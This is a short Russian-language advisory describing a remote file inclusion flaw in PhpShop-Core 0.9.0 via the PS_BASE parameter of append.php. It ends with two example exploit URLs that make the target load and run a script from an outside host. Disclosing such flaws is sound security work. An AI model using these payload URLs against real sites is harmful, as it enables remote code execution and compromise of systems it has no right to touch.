Программа: PhpShop-Core 0.9.0

Уязвимость позволяет злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных в параметре «PS_BASE» сценариями /core/html/append.php и /core/demo/append.php. Атакующий может выполнить произвольный сценарий в контексте безопасности Web сайта.

Примеры:

Http://www.Victem.0/[phpshop-core_PaTH]/modules/core/demo/ append.php?PS_BASE= http://www.human2human.org/cold.txt?

Http://www.Victem.0/[phpshop-core_PaTH]/modules/core/html/ append.php?PS_BASE= http://www.human2human.org/cold.txt?

Оставить мнение